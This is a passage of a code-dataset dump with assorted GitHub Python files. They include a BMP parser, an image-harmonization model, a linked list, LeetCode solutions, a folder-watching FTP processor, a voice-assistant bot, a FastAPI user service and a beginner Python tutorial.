\"Unsupported Format!\",\n \"Compression Not Supported!\",\n]\n\nerrors_cn = [\n '找不到文件!',\n '文件无效!',\n \"格式不支持!\",\n \"暂不支持压缩。\",\n]\n\n\nclass BMP(object):\n def __init__(self, filename, lang='cn'):\n self.__filename = filename\n if lang == 'en':\n self.__errors = errors_en\n elif lang == 'cn':\n self.__errors = errors_cn\n else:\n self.__errors = errors_cn\n self.__bmpprocess(filename)\n\n def __bmpprocess(self, filename):\n try: # upy下无法用os直接判断文件是否存在,故try\n with open(self.__filename, 'rb') as f:\n self.__stream = f.read()\n except:\n raise BMPException(self.__errors[0])\n\n # 文件头部分\n self.__bfType = unpack(\" 0:\n self.__hreversed = True # 高度反序\n else:\n self.__hreversed = False # 高度顺序\n self.height = -self.height\n\n # self.__biPlains = unpack(\"\n self.loss_names = ['G','G_L1']\n # specify the images you want to save/display. The training/test scripts will call \n self.visual_names = ['mask', 'harmonized','comp','real']\n \n # specify the models you want to save to the disk. The training/test scripts will call and \n self.model_names = ['G'] \n self.opt.device = self.device\n self.netG = networks.define_G(opt.netG, opt.init_type, opt.init_gain, self.opt)\n \n\n if self.isTrain:\n util.saveprint(self.opt, 'netG', str(self.netG)) \n # define loss functions\n self.criterionL1 = torch.nn.L1Loss()\n self.optimizer_G = torch.optim.Adam(filter(lambda p: p.requires_grad, self.netG.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n\n \n\n def set_position(self, pos, patch_pos=None):\n b = self.opt.batch_size\n self.pixel_pos = pos.unsqueeze(0).repeat(b, 1, 1, 1).to(self.device)\n self.pixel_pos = self.pixel_pos.flatten(2).permute(2, 0, 1)\n if self.opt.pos_none:\n self.input_pos = None\n else:\n input_pos = self.PatchPositionEmbeddingSine(self.opt)\n\n self.input_pos = input_pos.unsqueeze(0).repeat(b, 1, 1, 1).to(self.device)\n\n self.input_pos = self.input_pos.flatten(2).permute(2, 0, 1)\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap images in domain A and domain B.\n \"\"\"\n self.comp = input['comp'].to(self.device)\n self.real = input['real'].to(self.device)\n self.inputs = input['inputs'].to(self.device)\n self.mask = input['mask'].to(self.device)\n self.image_paths = input['img_path']\n\n self.revert_mask = 1-self.mask\n\n def data_dependent_initialize(self, data):\n \"\"\"\n The feature network netF is defined in terms of the shape of the intermediate, extracted\n features of the encoder portion of netG. Because of this, the weights of netF are\n initialized at the first feedforward pass with some input images.\n Please also see PatchSampleF.create_mlp(), which is called at the first forward() call.\n \"\"\"\n pass\n \n\n def forward(self):\n \"\"\"Run forward pass; called by both functions and .\"\"\"\n self.output = self.netG(inputs = self.inputs, pixel_pos=self.input_pos)\n # self.harmonized = self.output\n self.attention_add_h = self.output[:,0,:,:].unsqueeze(1)\n self.attention_add_l = self.output[:,1,:,:].unsqueeze(1)\n self.attention_add_s = self.output[:,2,:,:].unsqueeze(1)\n\n self.attention_mul_h = self.output[:,3,:,:].unsqueeze(1)\n self.attention_mul_l = self.output[:,4,:,:].unsqueeze(1)\n self.attention_mul_s = self.output[:,5,:,:].unsqueeze(1)\n\n h, l, s = self.comp.split(1, dim = 1)\n h = h*self.attention_mul_h + (self.attention_add_h) \n l = l*self.attention_mul_l + (self.attention_add_l)\n s = s*self.attention_mul_s + (self.attention_add_s)\n h = torch.clamp(h, 0, 1)\n l = torch.clamp(l, 0, 1)\n s = torch.clamp(s, 0, 1)\n\n self.harmonized = torch.cat([h, l, s], dim = 1)\n \n\n if not self.isTrain:\n self.harmonized = self.comp*self.revert_mask + self.harmonized*self.mask\n else: \n img_scale = [255,255,255]\n img_mean = [0, 0, 0]\n img_std = [1, 1, 1] \n tmp_real = ((self.real.permute(0,2,3,1)[0,:,:,:].cpu().numpy()*img_std+img_mean)*img_scale).astype(\"uint8\") \n tmp_real = cv2.cvtColor(tmp_real, cv2.COLOR_LAB2BGR).astype(\"uint8\") \n tmp_comp = ((self.comp.permute(0,2,3,1)[0,:,:,:].cpu().numpy()*img_std+img_mean)*img_scale).astype(\"uint8\") \n tmp_comp = cv2.cvtColor(tmp_comp, cv2.COLOR_LAB2BGR).astype(\"uint8\") \n tmp_harm = ((self.harmonized.permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy()*img_std+img_mean)*img_scale).astype(\"uint8\") \n tmp_harm = cv2.cvtColor(tmp_harm, cv2.COLOR_LAB2BGR).astype(\"uint8\") \n \n tmp_mask = self.mask.permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n tmp_h = torch.abs(self.attention_add_h).permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n tmp_l = torch.abs(self.attention_add_l).permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n tmp_s = torch.abs(self.attention_add_s).permute(0,2,3,1)[0,:,:,:].detach().cpu().numpy().repeat(3,axis=2) * 255 \n \n\n tmp_img = np.concatenate([tmp_real, tmp_comp, tmp_harm, tmp_mask, tmp_h, tmp_l, tmp_s],1) \n cv2.imwrite('./img.png', tmp_img)\n def compute_G_loss(self):\n \"\"\"Calculate L1 loss for the generator\"\"\"\n self.loss_G_L1 = self.criterionL1(self.harmonized, self.real)*self.opt.lambda_L1\n \n self.loss_G = self.loss_G_L1\n return self.loss_G\n\n def optimize_parameters(self):\n # forward\n self.forward()\n\n # update G\n self.optimizer_G.zero_grad()\n self.loss_G = self.compute_G_loss()\n self.loss_G.backward()\n self.optimizer_G.step()\n\n def PatchPositionEmbeddingSine(self, opt):\n temperature=10000\n if opt.stride == 1:\n feature_h = int(256/opt.ksize)\n else:\n feature_h = int((256-opt.ksize)/opt.stride)+1\n\n # feature_h = int(256/opt.ksize)*2\n num_pos_feats = 256//2\n mask = torch.ones((feature_h, feature_h))\n y_embed = mask.cumsum(0, dtype=torch.float32)\n x_embed = mask.cumsum(1, dtype=torch.float32)\n # if self.normalize:\n # eps = 1e-6\n # y_embed = y_embed / (y_embed[:, -1:, :] + eps) * self.scale\n # x_embed = x_embed / (x_embed[:, :, -1:] + eps) * self.scale\n\n dim_t = torch.arange(num_pos_feats, dtype=torch.float32)\n dim_t = temperature ** (2 * (dim_t // 2) / num_pos_feats)\n\n pos_x = x_embed[:, :, None] / dim_t\n pos_y = y_embed[:, :, None] / dim_t\n pos_x = torch.stack((pos_x[:, :, 0::2].sin(), pos_x[:, :, 1::2].cos()), dim=3).flatten(2)\n pos_y = torch.stack((pos_y[:, :, 0::2].sin(), pos_y[:, :, 1::2].cos()), dim=3).flatten(2)\n pos = torch.cat((pos_y, pos_x), dim=2).permute(2, 0, 1)\n return pos\n","repo_name":"XuqianRen/Semantic-guided-Multi-mask-Image-Harmonization","sub_path":"HarmonyTransformer/models/ht_model.py","file_name":"ht_model.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"73494948872","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 22 18:20:08 2020\r\n\r\n@author: mahesh\r\n\"\"\"\r\n\r\n\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass Single_linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n\r\n def push(self, data):\r\n new_node = Node(data)\r\n if self.head == None:\r\n self.head = new_node\r\n else:\r\n cur_node = self.head\r\n new_node.next = cur_node\r\n self.head = new_node\r\n cur_node = None\r\n\r\n\r\n def insert(self, prev_node, data):\r\n insert_status = False\r\n if self.head != None:\r\n new_node = Node(data)\r\n cur_node = self.head\r\n count = self.count()\r\n while count != 0:\r\n if cur_node.data == prev_node:\r\n if count == 1:\r\n cur_node.next = new_node\r\n else:\r\n new_node.next = cur_node.next\r\n cur_node.next = new_node\r\n\r\n insert_status = True\r\n break\r\n\r\n cur_node = cur_node.next\r\n count -= 1\r\n\r\n return insert_status\r\n\r\n\r\n def delete(self, key):\r\n del_status = False\r\n if self.head != None:\r\n cur_node = self.head\r\n if cur_node.data == key:\r\n self.head = cur_node.next\r\n cur_node = None\r\n del_status = True\r\n else:\r\n while True:\r\n prev_node = cur_node\r\n cur_node = cur_node.next\r\n if cur_node.data == key:\r\n if cur_node.next is None:\r\n prev_node.next = None\r\n cur_node = None\r\n else:\r\n prev_node.next = cur_node.next\r\n cur_node = None\r\n\r\n del_status = True \r\n break\r\n\r\n return del_status\r\n\r\n\r\n def display(self):\r\n if self.head is not None:\r\n ll = []\r\n cur_node = self.head\r\n ll.append(cur_node.data)\r\n while cur_node.next != None:\r\n cur_node = cur_node.next\r\n ll.append(cur_node.data)\r\n \r\n print(ll)\r\n else:\r\n print('[List is empty]')\r\n\r\n\r\n def count(self):\r\n ll_len = 0\r\n cur_node = self.head\r\n while cur_node != None:\r\n ll_len += 1\r\n cur_node = cur_node.next\r\n\r\n return ll_len\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sll = Single_linked_list()\r\n while True:\r\n choice = int(input('''1. Add element(s) to list\r\n2. Insert element after\r\n3. Delete\r\n4. Count\r\n5. Exit\r\nEnter your choose: '''))\r\n\r\n if choice == 1:\r\n print('\\n----------------------------------------')\r\n arr_len = int(input('How many element(s) want to add: '))\r\n arr = []\r\n for i in range(arr_len):\r\n e = input(f'Enter element {i}: ')\r\n arr.append(e)\r\n\r\n for e in arr:\r\n sll.push(e)\r\n\r\n print('Element(s) has been added to the list.')\r\n sll.display()\r\n print('----------------------------------------\\n')\r\n elif choice == 2:\r\n print('\\n----------------------------------------')\r\n if sll.count() > 0:\r\n sll.display()\r\n data = input('Enter data to be inserted: ')\r\n prev_node = input('After element: ')\r\n data_inserted = sll.insert(prev_node, data)\r\n if data_inserted:\r\n print('Data has been added.')\r\n sll.display()\r\n else:\r\n print(f'Element {prev_node} is not in the list. Try again!')\r\n else:\r\n print('List is empty, try again after adding some data.')\r\n\r\n print('----------------------------------------\\n')\r\n elif choice == 3:\r\n print('\\n----------------------------------------')\r\n if sll.count() > 0:\r\n sll.display()\r\n data = input('Data to be deleted: ')\r\n data_deleted = sll.delete(data)\r\n if data_deleted:\r\n print(\"Data has been deleted.\")\r\n sll.display()\r\n else:\r\n print(f'Element {data} is not in the list. Try again.')\r\n else:\r\n print('List is empty, try again after adding some data first.')\r\n\r\n print('----------------------------------------\\n')\r\n elif choice == 4:\r\n print('\\n----------------------------------------')\r\n count = sll.count()\r\n print(f'Total no of elements in list: {count}')\r\n print('----------------------------------------\\n')\r\n elif choice == 5:\r\n break\r\n else:\r\n print('\\nWrong choice. Try again.\\n')","repo_name":"maheshgawande/linked-list-data-structure","sub_path":"singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"9539692873","text":"import pygame\nimport math\nimport numpy as np\n\n\nclass Grid(object):\n def __init__(self, pos: tuple[int, int], row_column: list[int], cell_size: tuple[int, int], cell_color: tuple[int, int, int], border_color: tuple[int, int, int], border_size: int, screen: pygame.Surface):\n self.row_column = row_column\n self.cell_size = cell_size\n self.cell_color = cell_color\n self.border_color = border_color\n self.border_size = border_size\n self.pos = pos\n self.x_positions = []\n self.y_positions = []\n self.all_positions = []\n self.cells = []\n self.screen = screen\n self.ships = {}\n self.hits = {}\n self.locked_ships = {}\n self.returned_value = None\n self.was_clicked = False\n\n border_width = self.cell_size[0] * self.row_column[0] + \\\n (self.row_column[0] + 1) * self.border_size\n border_height = self.cell_size[1] * self.row_column[1] + \\\n (self.row_column[1] + 1) * self.border_size\n\n self.border = pygame.Rect(\n (self.pos), (border_width, border_height))\n\n for i in range(self.row_column[1]):\n self.cells.append([])\n pos_y = self.pos[1] + self.cell_size[1] * i + \\\n self.border_size * i + self.border_size\n if pos_y not in self.y_positions:\n self.y_positions.append(pos_y)\n\n for j in range(self.row_column[0]):\n pos_x = self.pos[0] + self.cell_size[0] * j + \\\n self.border_size * j + self.border_size\n if pos_x not in self.x_positions:\n self.x_positions.append(pos_x)\n self.cells[i].append(pygame.Rect(\n (pos_x, pos_y), self.cell_size))\n\n for y in range(self.row_column[1]):\n self.all_positions.append([])\n for x in range(self.row_column[0]):\n self.all_positions[y].append(\n (self.x_positions[x], self.y_positions[y]))\n\n def remove_from_grid(self, ship_num):\n self.locked_ships.pop(str(ship_num))\n\n def find_closest_cell(self, pos: tuple[int, int]) -> tuple[int, int]:\n if pos == (0, 0):\n return pos\n closest_candidates = []\n coords_list = []\n\n for x in self.x_positions:\n for y in self.y_positions:\n closest_candidates.append(\n math.sqrt(abs((pos[0] - x) ** 2) + abs(pos[1] - y) ** 2)) # this is distance between mouse position and currently selected coord)\n coords_list.append([x, y])\n\n temp = np.array(closest_candidates)\n closest_candidates.sort()\n temp = np.where(temp == closest_candidates[0])[0]\n closest_index = temp[0]\n\n # THIS is the coordinates of the coordinate that is closest to the mouse\n closest_index = coords_list[closest_index]\n\n return tuple(closest_index)\n\n def real_round(self, number: float) -> int:\n \"\"\"\n scuffed rounding\n \"\"\"\n\n if number == int(number):\n return int(number)\n # print(\"checking the number:\", number, \"->\", str(number/10)[3])\n if int(str(number/10)[3]) < 6:\n return int(number)\n else:\n return int(number) + 1\n\n def draw(self):\n pygame.draw.rect(self.screen, self.border_color, self.border)\n for y in self.cells:\n for x in y:\n pygame.draw.rect(self.screen, self.cell_color, x)\n\n def __del__(self):\n pass\n","repo_name":"ricsirogi/maze-creator","sub_path":"Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43072799883","text":"import extractfeature\nimport loaddata\nimport trainmodel\nimport testmodel\nimport time\nimport numpy as np\n\nif __name__ == '__main__':\n t0 = time.time()\n train_path = r\"F:\\Practice\\new\\ds2018\"\n test_path = r\"F:\\Practice\\new\\test1\"\n print(\"start loaddata\")\n train_list = loaddata.loaddata(train_path)\n print(\"train_list\")\n test_list = loaddata.loaddata(test_path)\n print(\"test_list\")\n train_feature = extractfeature.extractfeature(train_list)\n print(\"train_feature\")\n test_feature = extractfeature.extractfeature(test_list)\n print(\"test_feature\")\n print(test_feature)\n print(type(test_feature))\n # print(np.array(test_feature).shape)\n # trainmodel.trainmodel(train_feature)\n # print(\"train finished\")\n # #testmodel.testmodel(input_img=test_feature,top=2)\n # print('--------------------top5')\n # testmodel.testmodel(input_img=test_feature,top=5)\n # print('--------------------top5')\n print(time.time()-t0)\n","repo_name":"clevergirl123/practice_ML","sub_path":"NO1/something_new/mainp.py","file_name":"mainp.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28067866904","text":"# You are given a 0-indexed 2D integer array peaks where peaks[i] = [xi, yi] states that mountain i has a peak at coordinates (xi, yi). A mountain can be described as a right-angled isosceles triangle, with its base along the x-axis and a right angle at its peak. More formally, the gradients of ascending and descending the mountain are 1 and -1 respectively.\n# A mountain is considered visible if its peak does not lie within another mountain (including the border of other mountains).\n# Return the number of visible mountains.\n\n# Example 1:\n# Input: peaks = [[2,2],[6,3],[5,4]]\n# Output: 2\n# Explanation: The diagram above shows the mountains.\n# - Mountain 0 is visible since its peak does not lie within another mountain or its sides.\n# - Mountain 1 is not visible since its peak lies within the side of mountain 2.\n# - Mountain 2 is visible since its peak does not lie within another mountain or its sides.\n# There are 2 mountains that are visible.\n\n# Example 2:\n# Input: peaks = [[1,3],[1,3]]\n# Output: 0\n# Explanation: The diagram above shows the mountains (they completely overlap).\n# Both mountains are not visible since their peaks lie within each other.\n\n# class Solution:\n# does not work for [[2,2],[2,2],[3,1]]\n# def visibleMountains(self, peaks: List[List[int]]) -> int:\n# count = Counter((x,y) for x,y in peaks)\n# peaks = sorted([k for k, v in count.items() if v==1])\n# stack = []\n\n# def isHidden(peak1, peak2):\n# x1, y1 = peak1\n# x2, y2 = peak2\n# return x2-y2<=x1-y1 and x1+y1<=x2+y2\n\n\n# for i, peak in enumerate(peaks):\n# while stack and isHidden(peaks[stack[-1]], peak):\n# stack.pop()\n# if stack and isHidden(peak, peaks[stack[-1]]):\n# continue\n# stack.append(i)\n\n# return len(stack)\n\nclass Solution:\n # Time: O(nlogn), Space: O(n)\n def visibleMountains(self, peaks: List[List[int]]) -> int:\n stack = [-inf]\n curMax = 0\n for x, y in sorted(peaks):\n # find triangle x boundaries\n pos, neg = x-y, x+y\n\n # remove previous mountain that got overlapped\n while stack[-1] >= pos:\n stack.pop()\n\n # will not get overlapped by previous mountain\n if neg > curMax:\n curMax = neg\n stack.append(pos)\n return len(stack) - 1\n","repo_name":"Shifat11420/LeetcodeSolutions","sub_path":"neetcode/extraLeetcodeProblems/GoogleIQ/p2345-FindingTheNumberofVisibleMountains.py","file_name":"p2345-FindingTheNumberofVisibleMountains.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22294048119","text":"import os\nimport time\nfrom roesifier import process_new_file\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n\nclass OnMyWatch:\n\n def __init__(self):\n self.observer = Observer()\n # Set the directory on watch\n self.watch_directory = \"/ftphome/tranfer_files\"\n Handler.watch_directory = self.watch_directory\n\n def run(self):\n # define FTP path to scan all files before watchdog client\n dir_list = os.listdir(self.watch_directory)\n # scans all files in FTP dir and runs the main func before watchdog client\n for file in dir_list:\n process_new_file(file, self.watch_directory)\n\n #Handler.__class__.watch_directory = self.watch_directory\n event_handler = Handler()\n self.observer.schedule(event_handler, self.watch_directory, recursive=True)\n self.observer.start()\n try:\n while True:\n time.sleep(5)\n except Exception as error:\n self.observer.stop()\n\n self.observer.join()\n\n\nclass Handler(FileSystemEventHandler):\n watch_directory = \"\"\n @staticmethod\n # action's when Event(FIle) is closed:\n def on_closed(event, **kwargs):\n Handler()\n if event.is_directory:\n return None\n # create variable with the name of the file\n file_name = event.src_path.replace(Handler.watch_directory, '')\n process_new_file(file_name, Handler.watch_directory)\n\n\nif __name__ == '__main__':\n watch = OnMyWatch()\n watch.run()\n","repo_name":"Rsagiv/final","sub_path":"ftp_server/watchdog_classes.py","file_name":"watchdog_classes.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25428608279","text":"\nimport pyttsx3 # pip install pyttsx3\nimport datetime\nimport speech_recognition as sr # pip install SpeechRecognition\nimport sys\nimport wikipedia # pip install wikipedia\nimport webbrowser as wb\nimport os\nimport psutil # pip install psutil\nimport pyjokes # pip insatll pyjokes\n\nengine=pyttsx3.init()\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n \n# Function to tell time\ndef time():\n time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(\"The current time is\")\n speak(time)\n \n# Function to tell date\ndef date():\n year = int(datetime.datetime.now().year)\n month = int(datetime.datetime.now().month)\n date = int(datetime.datetime.now().day)\n speak(\"The current date is\")\n speak(date)\n speak(month)\n speak(year)\n \n# Function for greeting\ndef wishme():\n speak(\"Welcome back sir\")\n time()\n date()\n hour = datetime.datetime.now().hour\n if hour >=6 and hour<12:\n speak(\"Good Morning sir\")\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon sir\")\n elif hour >=18 and hour<24:\n speak(\"Good Evening sir\")\n else:\n speak(\"Good Night Sir\")\n speak(\"Alexa at your service. Please tell me how can i help you\")\n\n# Function to take your commands\ndef takeCommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold=1\n audio = r.listen(source)\n try:\n print(\"Recognizing..\")\n query = r.recognize_google(audio, language=\"en-in\")\n print(query)\n except Exception as e:\n print(e)\n speak(\"Say that again please...\")\n return \"None\"\n return query\n\n# Function for Cpu and Battery usage\ndef cpu():\n usage = str(psutil.cpu_percent())\n speak(\"cpu is at\"+ usage)\n battery = psutil.sensors_battery()\n speak(\"Battery is at\")\n speak(battery.percent )\n\n# Function for jokes\ndef jokes():\n joke = pyjokes.get_joke()\n print(joke)\n speak(joke)\n \n# Main function\nif __name__ == \"__main__\":\n wishme()\n while True:\n query = takeCommand().lower()\n \n if 'time' in query:\n time()\n \n elif 'date' in query:\n date()\n \n elif 'wikipedia' in query:\n speak(\"Searching...\")\n query = query.replace(\"wikipedia\",\"\")\n result = wikipedia.summary(query,sentences=2)\n print(result)\n speak(result)\n \n elif 'search in chrome' in query:\n speak(\"What should i search ?\")\n chromepath = \"C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s\"\n search = takeCommand().lower()\n wb.get(chromepath).open_new_tab(search+'.com')\n \n elif 'logout' in query: # Logout function\n os.system(\"Shutdown -l\")\n \n elif 'remember that' in query:\n speak(\"what should i remember?\")\n data = takeCommand()\n speak(\"you said me to remember that\"+data)\n remember = open('data.txt','w') # First create a empty data.txt file\n remember.write(data)\n remember.close()\n \n elif 'do you remember anything' in query:\n remember = open('data.txt','r')\n speak(\"you said to remember that\" +remember.read())\n \n elif 'cpu' in query:\n cpu()\n \n elif 'joke' in query:\n jokes()\n \n elif 'offline' in query: # Function to terminate the program\n sys.exit()\n \n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"NayakNaveen/AI_Bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3708596018","text":"import jwt\n\nfrom typing import Optional\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security import HTTPBearer\nfrom fastapi_sqlalchemy import db\nfrom pydantic import ValidationError\nfrom starlette import status\n\nfrom app.models.model_user_prt import UserPrt\nfrom app.core.config import settings\nfrom app.core.security import verify_password, get_password_hash\nfrom app.schemas.sche_token import TokenPayload\nfrom app.schemas.sche_user_prt import UserPrtCreateRequest, UserPrtUpdateRequest \n\n\n\nclass UserPrtService(object):\n __instance = None\n\n reusable_oauth2 = HTTPBearer(\n scheme_name='Authorization'\n )\n\n @staticmethod\n def create_user(data: UserPrtCreateRequest):\n new_user = UserPrt(\n company=data.company,\n email=data.email,\n address=data.address,\n phone=data.phone,\n mobile=data.mobile,\n tax_num=data.tax_num,\n bank_acc=data.bank_acc,\n ptype=data.ptype,\n )\n db.session.add(new_user)\n db.session.commit()\n return new_user\n\n @staticmethod\n def update(user: UserPrt, data: UserPrtUpdateRequest):\n print(f'data: {data.__dict__}')\n user.company = user.company if data.company is None else data.company\n user.email = user.email if data.email is None else data.email\n user.address = user.address if data.address is None else data.address\n user.phone = user.phone if data.phone is None else data.phone\n user.mobile = user.mobile if data.mobile is None else data.mobile\n user.tax_num = user.tax_num if data.tax_num is None else data.tax_num\n user.bank_acc = user.bank_acc if data.bank_acc is None else data.bank_acc\n user.ptype = user.ptype if data.ptype is None else data.ptype\n db.session.commit()\n return user\n","repo_name":"tara-ava/UberCompSubmission_Cli-Mate","sub_path":"backend/FastAPI-project-template/app/services/srv_user_prt.py","file_name":"srv_user_prt.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23527375555","text":"# -*- coding: utf-8 -*-\n\nimport csv\n\ndef readCSV(iteration):\n ids = []\n vectors = []\n labels = []\n with open('resultTRAIN{}.csv'.format(iteration), 'rU') as data:\n reader = csv.reader(data)\n count = 0\n for row in reader:\n if count != 0:\n ids.append(row[0])\n s = row[1].replace('[','').replace(']','').split(', ')\n tmp = [float(i) for i in s]\n vectors.append(tmp)\n labels.append(float(row[2]))\n count = 42\n return ids, vectors, labels\n\ndef readTestCSV(iteration):\n test_ids = []\n test_vectors = []\n test_labels = []\n with open('resultTEST{}.csv'.format(iteration), 'rU') as data:\n reader = csv.reader(data)\n count = 0\n for row in reader:\n if count != 0:\n test_ids.append(row[0])\n s = row[1].replace('[','').replace(']','').split(', ')\n tmp = [float(i) for i in s]\n test_vectors.append(tmp)\n test_labels.append(float(row[2]))\n count = 42\n return test_ids, test_vectors, test_labels","repo_name":"thorbenwiese/ML","sub_path":"Assignment11/dataAdapter.py","file_name":"dataAdapter.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4308552198","text":"# coding=utf-8\n# Date: 2021/7/14 10:19\nfrom typing import List\n\n\n# 执行用时:860 ms, 在所有 Python3 提交中击败了35.67%的用户\n# 内存消耗:26.9 MB, 在所有 Python3 提交中击败了69.94%的用户\nclass Solution:\n def minAbsoluteSumDiff(self, nums1: List[int], nums2: List[int]) -> int:\n mod = int(1e9) + 7\n n = len(nums1)\n a = nums1.copy()\n a.sort()\n sum, d = 0, 0\n for i in range(n):\n t = abs(nums1[i] - nums2[i])\n sum = (sum + t) % mod\n l, r = 0, n\n while l < r:\n mid = l + r >> 1\n if a[mid] >= nums2[i]:\n r = mid\n else:\n l = mid + 1\n if r < n:\n d = max(d, t - abs(a[r] - nums2[i]))\n if r > 0:\n d = max(d, t - abs(a[r - 1] - nums2[i]))\n return (sum - d + mod) % mod\n\n\nif __name__ == \"__main__\":\n print(Solution().minAbsoluteSumDiff([1, 28, 21], [9, 21, 20])) # 9\n","repo_name":"ToLoveToFeel/LeetCode","sub_path":"Python/_1818_Minimum_Absolute_Sum_Difference/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"15078809167","text":"from tqdm import trange\nfrom typing import (\n Iterable,\n Mapping,\n Sequence,\n Set,\n Tuple,\n )\n\n\n\ndef play_a_round(\n next_cups: Sequence[int],\n current_cup: int,\n ) -> int:\n \"\"\"\n array where arr[cup] = next_cup\n \"\"\"\n NUM_CARDS = len(next_cups) - 1\n\n # The crab picks up the three cups that are immediately clockwise of\n # the current cup. They are removed from the circle; cup spacing is\n # adjusted as necessary to maintain the circle.\n trio1 = next_cups[current_cup]\n trio2 = next_cups[trio1]\n trio3 = next_cups[trio2]\n next_cups[current_cup] = next_cups[trio3]\n\n # The crab selects a destination cup: the cup with a label equal to the\n # current cup's label minus one. If this would select one of the cups\n # that was just picked up, the crab will keep subtracting one until it\n # finds a cup that wasn't just picked up. If at any point in this\n # process the value goes below the lowest value on any cup's label, it\n # wraps around to the highest value on any cup's label instead.\n destination_cup = current_cup - 1\n exclusion = set((trio1, trio2, trio3))\n while destination_cup in exclusion or destination_cup < 1:\n destination_cup -= 1\n if destination_cup < 1:\n destination_cup = NUM_CARDS\n #print('destination:', destination_cup)\n\n # The crab places the cups it just picked up so that they are\n # immediately clockwise of the destination cup. They keep the same\n # order as when they were picked up.\n next_cups[trio3] = next_cups[destination_cup]\n next_cups[destination_cup] = trio1\n\n # The crab selects a new current cup: the cup which is immediately\n # clockwise of the current cup.\n # NOTE: data has changed and so will the current index thus we find it again.\n current_cup = next_cups[current_cup]\n\n return current_cup\n\n\n\ndef play_game(data: Tuple[int], num_rounds: int = 100):\n \"\"\"\n Play the game using an array where arr[cup] = next_cup\n \"\"\"\n current_cup = data[0]\n next_cups = [None] * (len(data) + 1)\n for c, n in zip(data, data[1:]):\n next_cups[c] = n\n next_cups[data[-1]] = data[0]\n assert len(set(next_cups)) == len(next_cups)\n\n for move in trange(num_rounds):\n current_cup = play_a_round(next_cups, current_cup)\n\n return next_cups\n","repo_name":"SamuelLarkin/AdventOfCode2020","sub_path":"23 - Crab Cups/game_with_array_of_next_cup.py","file_name":"game_with_array_of_next_cup.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4656600436","text":"# Calculations\nvar = (25 * 15 + 33) / 2.0\nprint (var)\n# Strings\nstring = 'I am a basic string'\nprint (string)\n# Replacing\nword = \"Ford\"\nword = 'L' +word[1:]\nprint(word)\n# Length of the strings\nvar2 = len('My length is enormous')\nprint ('The length of the statement is {y}'.format(y = var2))\n# Escape characters\nprint ('I\\'m a string in \"Python\" ')\nprint (r'c:\\system\\nan')\nprint (\"\"\"\\\n Hello:\n It is user defined output with triple quotes\n \"\"\")\n# Booleans (TRUE and FALSE)\nprint (5 < 6)\nprint (10 > 15)\nprint (2 >= 5)\nprint (4 != 2)\nprint (\"abc\" == \"abc\")\na = True\nb = False\nprint (not a)\n\n# If statement\npasserby_speech = 'Hiho'\nif passerby_speech == 'Hi' or passerby_speech == 'Hello':\n print (\"Hello, how are you doing?\")\nelif passerby_speech == 'Hey':\n print (\"Hi\")\nelse:\n print (\"I don't know you!\")\n\nif 5 < 7 :\n if 6 > 4:\n print (\"6 > 4\")\nnum = 6\nif num > 3 & num <= 5:\n print ('Number is 5')\nelse:\n print ('Number is not 5')\n# Turning operator (the value of a will be 7 if the condition is true or 14 if it is false)\na = 3\na = 7 if 3**3 > 9 else 14\nprint (a)\n# For loop\nfor i in range(1,10):\n print(i)\n\nfor i in range(1,10,2): #Od 1 do 10 co 2\n print(i)\n\nstring = 'String traversal!'\nfor i in range(len(string)):\n print(string[i])\n\nfor char in string: # Simpler version than above\n print(char)\n# 10 x 10 multiplication\nfor i in range(1,11):\n print ('{:<3}|'.format(i))\n\n# While loop\ncondition = 10\nwhile condition != 0:\n print (condition)\n condition = condition 